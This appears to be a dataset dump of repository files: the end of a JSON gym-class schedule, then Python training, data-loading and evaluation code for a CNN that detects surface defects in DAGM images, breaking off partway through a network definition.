"repo_name": "rbrown540/Final-Cloud-Project",
"src_encoding": "UTF-8",
"text": "{\n\"Spin Cycle with Jesse\":\n {\n \"Monday\": [{\"0515\": \"30k 'Hello Week'\"\n }],\n \"Tuesday\": [{\"0915\": \"Hills and Core\"\n }],\n \"Thursday\": [{\"0915\": \"Core and Hills\"\n }],\n \"Friday\": [{\"0515\": \"500 cal Friday\"\n }]\n },\n\"Rock Solid\":\n {\n \"Monday\": [{\"0615\": \"Get up Get ready\"\n }],\n \"Tuesday\": [{\"0615\": \"Four for your Core\"\n }],\n \"Wednesday\": [{\"0615\": \"Mike Mike Mike, guess what day it is!\"\n }],\n \"Thursday\": [{\"0615\": \"Friday Junior\"\n }],\n \"Friday\": [{\"0615\": \"IT'S FINALLY OVER\"\n }]\n },\n\"Yoga Chill\":\n {\n \"Monday\": [{\"1015\": \"Shhh \"\n }],\n \"Tuesday\": [{\"1015\": \"More Shhh\"\n }],\n \"Thursday\": [{\"1015\": \"So, Much, Shhh\"\n }],\n \"Friday\": [{\"1015\": \" zzz \"\n }]\n },\n\"More Jesse Spin\":\n {\n \"Saturday\": [{\"0000\": \"You'll be okay!!\"\n }],\n \"Sunday\": [{\"0000\": \"What? Are you seriously NOT working out right now?\"\n }]\n }\n}"
}
] | 2 |
sjk0709/Defect-Inspection-for-DAGM
|
https://github.com/sjk0709/Defect-Inspection-for-DAGM
|
46a3f04c70569066eefba418c0947bb2e1902fc9
|
17fb0a3cf36776b321ceb535ca5214218baa119a
|
eedf4b61aba7c5ff2ee843df7a96f78737c227bb
|
refs/heads/master
| 2020-04-03T14:07:30.703631 | 2018-10-30T05:22:02 | 2018-10-30T05:22:02 | 155,311,458 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.48276644945144653,
"alphanum_fraction": 0.49365079402923584,
"avg_line_length": 45.23928451538086,
"blob_id": "d65bd83948fcac35d6dfb20e305669b97ce28a4f",
"content_id": "81c6653c766710ed682b49beddd0bc1734d8d24f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13230,
"license_type": "permissive",
"max_line_length": 221,
"num_lines": 280,
"path": "/DAGM/DAGM_CNN_final/dagm_cnn_tf.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 24 10:56:53 2017\r\n\r\n@author: Jaekyung\r\n\"\"\"\r\nimport sys, os\r\nsys.path.append(os.pardir) # parent directory\r\nimport tensorflow as tf\r\nfrom tensorflow.python.tools import freeze_graph\r\nimport numpy as np\r\nimport time\r\nfrom xml.etree.ElementTree import Element, SubElement, dump, ElementTree\r\n\r\nsys.path.append(\"./networks\") # parent directory\r\n\r\n\r\n\r\nimport jkcnn1 as network\r\n\r\n\r\ntf.set_random_seed(777) # reproducibility\r\n\r\n\r\nclass Commander :\r\n \r\n def __init__(self, data, Model, args):\r\n \r\n self.args = args\r\n \r\n self.featureH = self.args.feature_shape[0]\r\n self.featureW = self.args.feature_shape[1] \r\n self.featureC = self.args.feature_shape[2]\r\n\r\n #=====\r\n self.checkpoint_state_name = \"checkpoint_state\"\r\n self.saved_checkpoint = 'saved_checkpoint'\r\n self.input_graph_name = \"input_graph.pb\"\r\n self.output_graph_name = \"output_graph.pb\" \r\n \r\n \r\n # initialize\r\n self.sess = tf.Session() \r\n self._model = Model(self.sess, name=\"DAGM\", learning_rate=self.args.learning_rate, \r\n feature_shape=self.args.feature_shape, lable_size=self.args.label_size )\r\n \r\n self._data = data\r\n \r\n \r\n \r\n# if not os.path.exists('out/'):\r\n# os.makedirs('out/')\r\n #dir_path = os.path.dirname(os.path.realpath(__file__)) # To get the full path to the dirctory\r\n #cwd = os.getcwd() # To get the current working directory\r\n\r\n\r\n self.model_dir = \"models_tf/\"\r\n if not os.path.exists(self.model_dir):\r\n os.mkdir(self.model_dir) \r\n self.checkpoint_dir = self.model_dir + self.args.load_folder_file[0]\r\n if not os.path.exists(self.model_dir):\r\n os.mkdir(self.model_dir) \r\n \r\n \r\n #self.checkpoint_prefix = os.path.join(self.checkpoint_dir, '/ensemble_model'+str(self.start_model_num)+'_'+str(self.end_model_num))\r\n #print(self.checkpoint_prefix) \r\n \r\n self.input_graph_path = self.model_dir + self.args.load_folder_file[0] \r\n self.checkpoint_prefix = self.checkpoint_dir + self.saved_checkpoint\r\n self.checkpoint_prefix_backup = self.checkpoint_dir + self.saved_checkpoint +'_backup'\r\n self.checkpoint_prefix_optimal = self.checkpoint_dir + self.saved_checkpoint +'_optimal'\r\n self.input_checkpoint_path = self.checkpoint_prefix + \"-0\" \r\n\r\n self._saver = tf.train.Saver()\r\n checkpoint = tf.train.get_checkpoint_state(self.checkpoint_dir, latest_filename=self.checkpoint_state_name)\r\n\r\n self.sess.run(tf.global_variables_initializer())\r\n \r\n if self.args.load_model:\r\n if checkpoint and checkpoint.model_checkpoint_path:\r\n self._saver.restore(self.sess, checkpoint.model_checkpoint_path) \r\n print(\"|===============================================================================|\")\r\n print(\"|===== \" + checkpoint.model_checkpoint_path + \" has been loaded.=====|\")\r\n print(\"|===============================================================================|\")\r\n elif False:\r\n print(\"There are no models\")\r\n raise Exception(\"Could not load checkpoints for playback\")\r\n else:\r\n print(\"Frist training\")\r\n \r\n \r\n \r\n def recordTrainInformation(self, trainingEpochs, batchSize, minCost, maxAccuracy, elapsedTime): \r\n note = Element(\"TrainingInformation\")\r\n SubElement(note, \"TrainingEpochs\").text = str(trainingEpochs)\r\n SubElement(note, \"BatchSize\").text = str(batchSize) \r\n SubElement(note, \"MinCost\").text = str(minCost)\r\n SubElement(note, \"MaxAccuracy\").text = str(maxAccuracy)\r\n SubElement(note, \"ElapsedTime\").text = str(elapsedTime)\r\n dump(note) \r\n ElementTree(note).write(self.model_dir + \"training_imformation.xml\")\r\n \r\n def createModelInformationXML(self): \r\n note = Element(\"ModelSetting\")\r\n to = Element(\"ModelName\")\r\n to.text = self.args.load_folder_file[1] \r\n note.append(to)\r\n SubElement(note, \"FeatureWidth\").text = str(self.args.feature_shape[0])\r\n SubElement(note, \"FeatureHeight\").text = str(self.args.feature_shape[1]) \r\n SubElement(note, \"LabelSize\").text = str(self.args.label_size)\r\n dump(note) \r\n ElementTree(note).write(self.model_dir + self.args.load_folder_file[1] + \".xml\")\r\n \r\n \r\n def train(self, nReDataExtraction=5, training_epochs=20, batch_size=128):\r\n # Save our model\r\n tf.train.write_graph(self.sess.graph_def, self.checkpoint_dir, self.input_graph_name, as_text=True)\r\n \r\n start_time = time.perf_counter()\r\n minCost = 100000.\r\n maxAccuracy = 0.\r\n elapsed_time = 0.\r\n current_epoch = 0\r\n \r\n # train my model\r\n print('Learning Started!') \r\n \r\n self._data.getBlockImages(blockH=self.featureH, blockW=self.featureW,\r\n nOKperClass=40, nNGperClass=40,\r\n classNoList=self.args.classNoList, \r\n label_type='array', isTrain=False) \r\n \r\n current_accuracy = 0\r\n max_accuracy = self.args.optimalAccuracyThreshold\r\n for i in range(nReDataExtraction): \r\n \r\n self._data.getBlockImages(blockH=self.featureH, blockW=self.featureW, \r\n nOKperClass=160, nNGperClass=160, \r\n classNoList=self.args.classNoList, \r\n label_type='array', isTrain=True)\r\n \r\n for epoch in range(training_epochs):\r\n avg_cost = 0.0\r\n total_batch = int(self._data.train.num_examples / batch_size) \r\n \r\n for k in range(total_batch):\r\n batch_xs, batch_ys = self._data.train.next_batch(batch_size)\r\n # print(batch_xs.shape, batch_ys.shape)\r\n # train each model \r\n batch_xs = np.reshape(batch_xs, [-1, self.featureH, self.featureW, self.featureC])\r\n cost, _ = self._model.train(batch_xs, batch_ys)\r\n avg_cost += cost \r\n \r\n avg_cost /= total_batch \r\n \r\n if epoch % 10 == 0:\r\n # save parameters, training information and our model \r\n # save_path = saver.save(sess, checkpoint_path + '/network') \r\n save_path = self._saver.save(self.sess, self.checkpoint_prefix_backup, global_step=0, latest_filename=self.checkpoint_state_name) \r\n save_path = self._saver.save(self.sess, self.checkpoint_prefix, global_step=0, latest_filename=self.checkpoint_state_name) \r\n \r\n current_accuracy = self.test(testBatchSize=256)\r\n minCost = min(minCost, avg_cost)\r\n maxAccuracy = max(maxAccuracy, current_accuracy)\r\n print('--------------------------------------------------------------------')\r\n print(\"Current model has been saved.\")\r\n print('Epoch : %04d' % (i*training_epochs + epoch), ' | Cost =', avg_cost) \r\n print('--------------------------------------------------------------------')\r\n if current_accuracy >= max_accuracy:\r\n max_accuracy = current_accuracy \r\n save_path = self._saver.save(self.sess, self.checkpoint_prefix_optimal, global_step=0, latest_filename=self.checkpoint_state_name)\r\n break\r\n if current_accuracy >= max_accuracy:\r\n break\r\n \r\n # show all variables name\r\n# for op in tf.get_default_graph().get_operations():\r\n# print (str(op.name))\r\n \r\n elapsed_time = (time.perf_counter() - start_time)\r\n \r\n # Save training information and our model \r\n self.recordTrainInformation(current_epoch, batch_size, minCost, maxAccuracy, elapsed_time)\r\n tf.train.write_graph(self.sess.graph_def, self.model_dir, self.input_graph_name, as_text=True) \r\n \r\n print('=====================================================================')\r\n print('Minimum cost : ', minCost)\r\n print(\"Maximum accuracy : \", maxAccuracy)\r\n print('Elapsed %.3f seconds.' % elapsed_time)\r\n print('%.0f h' % (elapsed_time/3600), '%.0f m' % ((elapsed_time%3600)/60) , '%.0f s' % (elapsed_time%60) )\r\n print('Learning Finished!') \r\n print('=====================================================================')\r\n \r\n \r\n \r\n \r\n def test(self, testBatchSize=100):\r\n \r\n # Test model and check accuracy \r\n avg_accuracy = 0.0\r\n nIter = int(self._data.test.num_examples / testBatchSize) \r\n \r\n for i in range(nIter):\r\n testX, testY = self._data.test.next_batch(testBatchSize) \r\n testX = np.reshape(testX, [-1, self.featureH, self.featureW, self.featureC])\r\n accuracy = self._model.get_accuracy(testX, testY)\r\n avg_accuracy += accuracy \r\n \r\n avg_accuracy /= nIter\r\n# print('logits : ', self._model.predict(testX)) \r\n print('--------------------------------------------------------------------')\r\n print('Accuracy: %.2f' %(avg_accuracy*100.0), \"%\")\r\n print('--------------------------------------------------------------------')\r\n \r\n return avg_accuracy\r\n \r\n \r\n def freezeModel(self, output_node_names=\"prob\" ): \r\n # Note that we this normally should be only \"output_node\"!!!\r\n input_saver_def_path = \"\" \r\n input_binary = False \r\n restore_op_name = \"save/restore_all\"\r\n filename_tensor_name = \"save/Const:0\"\r\n input_graph_path = self.checkpoint_dir + self.input_graph_name \r\n output_graph_path = self.checkpoint_dir + self.output_graph_name\r\n clear_devices = False \r\n freeze_graph.freeze_graph(input_graph_path, input_saver_def_path,\r\n input_binary, self.input_checkpoint_path,\r\n output_node_names, restore_op_name,\r\n filename_tensor_name, output_graph_path,\r\n clear_devices, False)\r\n \r\n # make XML\r\n self.createModelInformationXML()\r\n print('Freezing the model finished!')\r\n \r\n \r\nclass dotdict(dict):\r\n def __getattr__(self, name):\r\n return self[name]\r\n \r\n \r\nif __name__ == '__main__': \r\n \r\n print(\"Tensorflow version :\", tf.__version__)\r\n\r\n args = dotdict({\r\n# 'dataPath' : '../../../JKcloud/DB_JK/DAGM2007_dataset',\r\n 'dataPath' : '../../../JKcloud/DB_JK/DAGM_dataset',\r\n 'training' : False ,\r\n 'load_model': True, \r\n 'load_folder_file': ('DAGM2_jkcnn1_32_12/','saved_checkpoint-0'), \r\n 'optimalAccuracyThreshold' : 0.98,\r\n 'label_format' : 2,\r\n 'classNoList' : [1,2,3,4,5,6],\r\n 'feature_shape' : [32, 32, 1], # (H, W, C)\r\n 'label_size' : 12,\r\n 'nReDataExtraction' : 100,\r\n 'nTrainingEpochs': 50,\r\n 'batch_size' : 256, \r\n 'learning_rate' : 1e-4, \r\n })\r\n \r\n import dagmCV2 as DAGM\r\n \r\n# dagm = DAGM.DAGM(args.dataPath)\r\n dagm = DAGM.DAGM(args.dataPath, label_format=args.label_format)\r\n commander = Commander(data=dagm, Model=network.Model, args=args) \r\n# \r\n if(args.training==True):\r\n commander.train(nReDataExtraction=args.nReDataExtraction, training_epochs=args.nTrainingEpochs, batch_size=args.batch_size) \r\n commander.freezeModel()\r\n \r\n elif(args.training==False): \r\n# mode = int(input(\"1.training | 2.accuracy test | 3.Freeze a model : \"))\r\n \r\n commander._data.getBlockImages(blockH=args.feature_shape[0], blockW=args.feature_shape[1], \r\n nOKperClass=1, nNGperClass=1, classNoList=args.classNoList, \r\n label_type='array', isTrain=False) \r\n commander.test(100) \r\n\r\n"
},
{
"alpha_fraction": 0.5023980736732483,
"alphanum_fraction": 0.5172147750854492,
"avg_line_length": 34.1656608581543,
"blob_id": "eb6bfa12c3db172304cb384b84786aa3e069fef2",
"content_id": "e7ef6281ecfd9e785289e0850e009584c952c45b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11708,
"license_type": "permissive",
"max_line_length": 124,
"num_lines": 332,
"path": "/DAGM/DAGM_CNN_pytorch/dagmCV.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys, os\nsys.path.append(os.pardir) # parent directory\n#import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport matplotlib.gridspec as gridspec\nfrom sklearn.feature_extraction import image\n# from PIL import Image\nimport cv2\nimport glob\nimport random\nimport struct\n\n\n# PIL_JK class includes PIL util made by JK\n\nclass Data(object):\n def __init__(self):\n self.images = np.zeros(1)\n self.labels = np.zeros(1)\n self.start_batch = 0\n self.end_batch = 0\n self.num_examples = 0\n \n def next_batch(self, batch_size):\n mini_batch = np.random.choice(len(self.images), batch_size, replace=False)\n \n# self.end_batch = self.start_batch+batch_size\n# mini_batch = np.arange(self.start_batch, self.end_batch)\n# if self.end_batch!=len(self.images):\n# self.start_batch = self.end_batch\n# else :\n# self.start_batch = 0\n \n return self.images[mini_batch], self.labels[mini_batch]\n \n\ndef genImgListWithFilename(folderpath, imgType, start, end): # input : path # output : imgList # path안의 이미지들을 리스트로 만들어준다.\n imgList = [] \n for i in range(start, end+1):\n filepath = folderpath+ '/' + str(i) + '.' + imgType \n image = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE) # B, G, R \n# cv2.imshow('ddd',image)\n# cv2.waitKey(0)\n imgList.append(image) \n return imgList \n\n\ndef cvRotateImg(img, angle): \n rows = img.shape[0]\n cols = img.shape[1]\n M = cv2.getRotationMatrix2D((cols/2,rows/2),angle,1)\n image = cv2.warpAffine(img,M,(cols,rows))\n return image\n \n# data augmentation \ndef dataAugmentation(image):\n Xli = []\n \n verticalFlip = cv2.flip(image,1) # vertical flip \n for i in range(1, 5): \n augmentedImg1 = cvRotateImg(image, 90*i)\n augmentedImg2 = cvRotateImg(verticalFlip, 90*i)\n Xli.append(augmentedImg1) \n Xli.append(augmentedImg2) \n \n return Xli\n \nclass DAGM(object):\n \"\"\"\n \n \"\"\"\n def __init__(self, dataPath):\n self.dataPath = dataPath\n \n self.label_size = 12\n \n self._blockW = 32\n self._blockH = 32 \n self.nBlockPerImage = 5\n self.nOKimgPerClass = 80\n self.nNGimgPerClass = 80\n \n self.trainOKImgIndices = []\n self.testOKImgIndices = []\n self.trainNGImgIndices = [] \n self.testNGImgIndices = []\n for i in range(1, 701): self.trainOKImgIndices.append(i)\n for i in range(701, 1001): self.testOKImgIndices.append(i)\n for i in range(1, 106): self.trainNGImgIndices.append(i) \n for i in range(106, 151): self.testNGImgIndices.append(i)\n \n #readFreeImg()\n self.train = Data()\n self.test = Data() \n \n \n def extractBlocksInOK(self, classNo, isTrain=True ):\n \n tempXli = []\n tempYli = [] \n\n chosen_indices = ''\n \n classPath = self.dataPath + '/Class' + str(classNo) + '/'\n Y = np.zeros([self.label_size], dtype='float32') \n if self.label_size==12:\n Y[classNo-1] = 1\n elif self.label_size==13:\n Y[classNo] = 1\n \n\n if isTrain:\n if self.nOKimgPerClass>len(self.trainOKImgIndices):\n self.nOKimgPerClass=len(self.trainOKImgIndices)\n chosen_indices = random.sample(self.trainOKImgIndices, self.nOKimgPerClass) \n else:\n if self.nOKimgPerClass>len(self.testOKImgIndices):\n self.nOKimgPerClass=len(self.testOKImgIndices)\n chosen_indices = random.sample(self.testOKImgIndices, self.nOKimgPerClass)\n for imgNo in chosen_indices:\n Xpath = classPath + str(imgNo) + '.png' \n \n tempX = cv2.imread(Xpath, cv2.IMREAD_GRAYSCALE) # B, G, R \n \n try:\n tempX = image.extract_patches_2d(tempX, (self._blockH, self._blockW), max_patches=self.nBlockPerImage) \n except:\n print(\"This image has a problem.\")\n print(Xpath)\n pass\n \n for j in range(self.nBlockPerImage):\n tempXli.append(tempX[j]/255.)\n tempYli.append(Y) \n \n return tempXli, tempYli \n \n def extractBlocksInNG(self, classNo, labelInfo, isTrain=True ):\n \n tempXli = []\n tempYli = [] \n\n chosen_indices = ''\n \n classPath = self.dataPath + '/Class' + str(classNo) + '_def/' \n Y = np.zeros([self.label_size], dtype='float32') \n if self.label_size==12:\n Y[classNo+5] = 1\n elif self.label_size==13:\n Y[classNo+6] = 1\n \n if self.nNGimgPerClass<8:\n self.nNGimgPerClass=8 \n \n if isTrain:\n numNGimgPerClass = int(self.nNGimgPerClass/8.) \n if numNGimgPerClass>len(self.trainNGImgIndices):\n numNGimgPerClass=len(self.trainNGImgIndices) \n chosen_indices = random.sample(self.trainNGImgIndices, numNGimgPerClass) \n \n else: \n numNGimgPerClass = int(self.nNGimgPerClass/8.)\n if numNGimgPerClass>len(self.testNGImgIndices):\n numNGimgPerClass=len(self.testNGImgIndices) \n chosen_indices = random.sample(self.testNGImgIndices, numNGimgPerClass)\n\n for imgNo in chosen_indices:\n \n Xpath = classPath + str(imgNo) + '.png'\n tempX = cv2.imread(Xpath, cv2.IMREAD_GRAYSCALE) # B, G, R \n lastX = tempX.shape[1]-self._blockW-1\n lastY = tempX.shape[0]-self._blockH-1\n \n tempInfo = labelInfo[imgNo-1]\n semi_major = float(tempInfo[1]) # semi-major axis\n semi_minor = float(tempInfo[2]) # semi-minor axis \n rotAngle = float(tempInfo[3]) # rotation angle\n cx = float(tempInfo[4]) # x of the centre\n cy = float(tempInfo[5]) # y of the centre\n \n for j in range(self.nBlockPerImage):\n \n theta = random.uniform(0, 2*np.pi)\n x = random.uniform(0, semi_major)*np.cos(theta)\n y = random.uniform(0, semi_minor)*np.sin(theta)\n xp = x*np.cos(rotAngle) - y*np.sin(rotAngle)\n yp = x*np.sin(rotAngle) + y*np.cos(rotAngle)\n xp = int(cx + xp)\n yp = int(cy + yp)\n \n left = xp-int(0.5*self._blockW)\n top = yp-int(0.5*self._blockH)\n \n if(left<0 ):\n left = 0\n if(left>lastX):\n left = lastX\n if(top<0):\n top = 0\n if(top>lastY ):\n top = lastY \n \n start_x = left\n end_x = left+self._blockW\n start_y = top\n end_y = top +self._blockH \n \n cropX = tempX[start_y:end_y, start_x:end_x]\n \n # data augmentation \n tempXli += dataAugmentation(cropX/255.)\n for k in range(8): tempYli.append(Y)\n \n # data augmentation \n# for i in range(1, 5): \n# for j in [True, False]:\n# augmentedImg = cvRotateImg(original, 90*i)\n# if j:\n# augmentedImg = cv2.flip(augmentedImg,0) # horizontal flip\n# Xli.append(augmentedImg/255.)\n# Yli.append(Y)\n \n \n# print(\"the number of images without defect : \", len(tempXli)) # the number of defective free images\n \n return tempXli, tempYli \n \n def getBlockImages(self, blockH, blockW, nOKperClass, nNGperClass, \n classNoList, label_type='array', isTrain=False):\n# def genBlockData(self, block_size, nOKimgPerClass=160, nNGimgPerClass=160, isTrain=True):\n\n self._blockH = blockH\n self._blockW = blockW\n self.nOKimgPerClass = nOKperClass\n self.nNGimgPerClass = nNGperClass\n \n dataX = [] \n dataY = []\n \n for classNo in range(1, 7):\n \n # OK\n bufferX, bufferY = self.extractBlocksInOK(classNo, isTrain=isTrain)\n dataX += bufferX # training set X\n dataY += bufferY # training set Y \n \n # NG\n labelInfoPath = self.dataPath + '/Class' + str(classNo) + '_def/' \n labelInfoFile = open(labelInfoPath+'labels.txt', 'r') \n labelInfoList = []\n for i in range(150): \n labelInfoList.append( labelInfoFile.readline().split() )\n \n bufferX, bufferY = self.extractBlocksInNG(classNo, labelInfoList, isTrain=isTrain)\n dataX += bufferX # training set X\n dataY += bufferY # training set Y \n \n dataX = np.array(dataX, dtype=np.float32)\n dataY = np.array(dataY, dtype=np.float32)\n \n if isTrain:\n self.train.images = dataX\n# self.train.images = self.train.images.reshape(-1, blockW*blockH*1)\n self.train.images = self.train.images.reshape(-1, self._blockH, self._blockW, 1)\n self.train.labels = dataY\n self.train.num_examples = self.train.images.shape[0]\n print(\"Train images shape :\", self.train.images.shape)\n print(\"Train labels shape :\", self.train.labels.shape)\n else :\n self.test.images = dataX\n# self.test.images = self.test.images.reshape(-1, blockW*blockH*1)\n self.test.images = self.test.images.reshape(-1, self._blockH, self._blockW, 1)\n self.test.labels = dataY\n self.test.num_examples = self.test.images.shape[0]\n print(\"Test images shape :\", self.test.images.shape)\n print(\"Test labels shape :\", self.test.labels.shape)\n \n \n \n \n \n\n \n \nif __name__ == '__main__': \n \n\n dataPath = '../DAGM2007_dataset'\n\n \n dagm = DAGM(dataPath) \n \n batch_size = 10\n \n for i in range(10):\n trainX, trainY = dagm.train.next_batch(batch_size)\n print(trainX.shape)\n #print(trainX)\n print(trainY.shape)\n #print(trainY)\n print('-----------------------------------------------------')\n\n \n images = dagm.train.images\n labels = dagm.train.labels\n print(images.shape)\n print(labels.shape)\n \n# dagm.genImgWithoutDefect()\n\n# dagm.genImgArr()\n# dagm.genImgArrWithoutDefect()\n# dagm.genImgArrWithDefect()\n#\n#\n\n# dagm.readImgWithoutDefect(1)\n# trainX = dagm.train.images\n# trainY = dagm.train.labels\n# print(trainX[0])\n# print(trainY[0])\n# trX, trY = dagm.train.next_batch(5)\n# print(dagm.train.num_examples)\n# print( trX.shape, trY.shape)\n# X = trainX[0].reshape(32,32)\n# plt.imshow(np.array(X), cmap=plt.get_cmap('gray')) \n# plt.show()\n# \n"
},
{
"alpha_fraction": 0.5746110081672668,
"alphanum_fraction": 0.5977723002433777,
"avg_line_length": 28.98404312133789,
"blob_id": "a5e1bc95585f350c9e40df56f81cb0ad964588a3",
"content_id": "9b338804b62ad44335c57b736ff49bb878bf8836",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5656,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 188,
"path": "/DAGM/DAGM_CNN_final/dagm_cnn_evaluation.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 28 16:38:27 2018\n\n@author: song\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 12 20:49:19 2018\n\n@author: song\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nConvolutional VAriational Autoencode\n\n@author: Jaekyung Song\n\"\"\"\n\nimport sys, os\n#sys.path.append(os.pardir) # parent directory\nimport numpy as np\nimport time\nimport glob\n#from xml.etree.ElementTree import Element, SubElement, dump, ElementTree\n\nimport tensorflow as tf\n#import torch\n#import torch.nn as nn\n#import torch.optim as optim\n#import torch.nn.init as init\n#import torch.nn.functional as F\n#import torchvision.datasets as dset\n#import torchvision.transforms as transforms\n#from torch.utils.data import TensorDataset\n#from torch.utils.data import DataLoader\nfrom torch.autograd import Variable\n\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\nimport matplotlib.pyplot as plt\nimport cv2\n\nsys.path.append(\"../../ML_utils\")\nimport JK_image\n\n\n\n#import matplotlib.animation as animation\n#from sklearn.feature_extraction import image\n#from PIL import Image\nsys.path.append(\"networks\") # parent directory\n\n\ndef numpyToTorchVariable( array, isGPU=True):\n array_torch = torch.from_numpy(array) \n if isGPU:\n array_torch = Variable(array_torch).cuda()\n else :\n array_torch = Variable(array_torch).cpu()\n return array_torch\n\ndef detectDefect( args, result_type=1, isResultSave=True):\n \n # images = getImagesNumberOrder(args.folderPathForEval)\n images = JK_image.getImages(args.folderPathForEval)\n nImages = len(images)\n height = images[0].shape[0]\n width = images[0].shape[1] \n \n blockW = args.feature_shape[0]\n blockH = args.feature_shape[1]\n blockC = args.feature_shape[2]\n \n resultFolderPath = \"./results/\"\n if not os.path.exists(resultFolderPath):\n os.mkdir(resultFolderPath) \n \n model_dir = \"models_tensorflow/\"\n if not os.path.exists(model_dir):\n os.mkdir(model_dir) \n checkpoint_dir = model_dir + args.load_folder_file[0]\n if not os.path.exists(model_dir):\n os.mkdir(model_dir)\n# latest_filename = \"checkpoint_state\"\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n\n\n saved_graph_file = checkpoint_dir + args.load_folder_file[1] + '.meta'\n saver = tf.train.import_meta_graph(saved_graph_file)\n \n checkpoint = tf.train.get_checkpoint_state(checkpoint_dir, latest_filename=\"checkpoint_state\") \n if checkpoint and checkpoint.model_checkpoint_path:\n saver.restore(sess, checkpoint.model_checkpoint_path)\n print(\"Loaded checkpoints %s\" % checkpoint.model_checkpoint_path)\n elif False:\n raise Exception(\"Could not load checkpoints for playback\")\n\n result_images = []\n total_results = []\n for imgNo in range(nImages):\n \n# plt.imshow(images[imgNo], cmap='gray')\n# plt.show() \n \n Xs = []\n tempX = images[imgNo]/255.\n for j in range(0, height, blockH):\n for i in range(0, width, blockW): \n# print((i,i+blockW), (j,j+blockH))\n Xs.append(tempX[i:i+blockW, j:j+blockH])\n \n \n Xs = np.array(Xs, dtype=np.float32).reshape([-1, blockW * blockH * blockC])\n \n graph = tf.get_default_graph()\n training = graph.get_tensor_by_name(\"DAGM/training:0\")\n input = graph.get_tensor_by_name(\"DAGM/input:0\")\n# result_prob = graph.get_tensor_by_name(\"prob:0\") \n# Ys_prob = sess.run(result_prob, feed_dict={input:Xs, training:False})\n result = graph.get_tensor_by_name(\"result:0\") \n Ys = sess.run(result, feed_dict={ input:Xs, training:False}) \n \n# Ys[np.where(Ys>=6)] = 1.0\n# Ys[np.where(Ys>=6)] = 1.0\n# Ys = Ys.reshape([16,16]).T\n# \n# result_image = np.full([16, 16], 0) \n result_image = np.zeros([16,16]) \n for i in range(16):\n for j in range(16):\n classNo = Ys[j+i*16] \n if classNo>=6:\n result_image[j,i] = 1\n \n result_image = cv2.resize(result_image, (512,512), interpolation=cv2.INTER_LINEAR) # INTER_CUBIC INTER_LINEAR INTER_AREA\n result_images.append(result_image)\n \n# plt.imshow(result_image, cmap='gray')\n# plt.show() \n if imgNo==0:\n total_results = result_image\n else:\n total_results = np.concatenate((total_results, result_image), axis=1) \n \n images = np.array(images, dtype=\"float\").reshape([-1,512,512]) \n result_images = np.array(result_images, dtype=\"float\").reshape([-1,512,512]) \n# print(result_images.shape)\n plt.imshow(total_results, cmap='gray')\n plt.show()\n \n\n# print(\"Input size :\", X_np.shape)\n# print(\"Output size :\", output.shape)\n# print(\"========================================================\")\n \n \n \nclass dotdict(dict):\n def __getattr__(self, name):\n return self[name]\n\n \n\nif __name__ == '__main__': \n \n print(\"Tensorflow version :\", tf.__version__)\n \n # GPU check\n\n \n args = dotdict({\n 'isGPU' : False, #False, # True,\n 'load_folder_file': (\"DAGM_jknet1_32/\",'saved_checkpoint-0'), #(\"ForClass4_jkfcn3/\",'ForClass4_jkfcn3'), # \n 'folderPathForEval': \"./DataForEval\",\n 'feature_shape' : (32,32,1),\n })\n \n \n detectDefect(args, isResultSave=True ) \n \n "
},
{
"alpha_fraction": 0.48028749227523804,
"alphanum_fraction": 0.5061832666397095,
"avg_line_length": 56.4012336730957,
"blob_id": "e81c6cc51612ca536473ab04cad98c935aa1c005",
"content_id": "72681ae3affd796c87c54392db9a5ca48be79379",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9461,
"license_type": "permissive",
"max_line_length": 154,
"num_lines": 162,
"path": "/DAGM/DAGM_CNN_final/networks/jkcnn2.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 24 10:56:53 2017\r\n\r\n@author: Jaekyung\r\n\"\"\"\r\nimport sys, os\r\nsys.path.append(os.pardir) # parent directory\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\n\r\ntf.set_random_seed(777) # reproducibility\r\n\r\n\r\nclass Model:\r\n \r\n def __init__(self, sess, name, learning_rate=0.0001, feature_shape=[32,32,1], lable_size=12, weight_decay_rate=1e-5):\r\n self.sess = sess\r\n self._name = name\r\n self._learning_rate = learning_rate\r\n self._feature_shape = feature_shape\r\n self._lable_size = lable_size\r\n \r\n self.kernel_regularizer = tf.contrib.layers.l2_regularizer(scale=weight_decay_rate)\r\n \r\n self._build_net()\r\n \r\n \r\n \r\n def _build_net(self): \r\n with tf.variable_scope(self._name):\r\n # dropout (keep_prob) rate 0.7~0.5 on training, but should be 1\r\n # for testing \r\n self.training = tf.placeholder(tf.bool, name=\"training\")\r\n\r\n # input place holders\r\n self.X = tf.placeholder( tf.float32, [None, self._feature_shape[0], self._feature_shape[1], self._feature_shape[2]], name=\"input\") \r\n self.Y = tf.placeholder(tf.float32, [None, self._lable_size])\r\n \r\n # Convolutional Layer #2 and Pooling Layer #2\r\n l1 = tf.layers.conv2d(inputs=self.X, filters=64, kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n 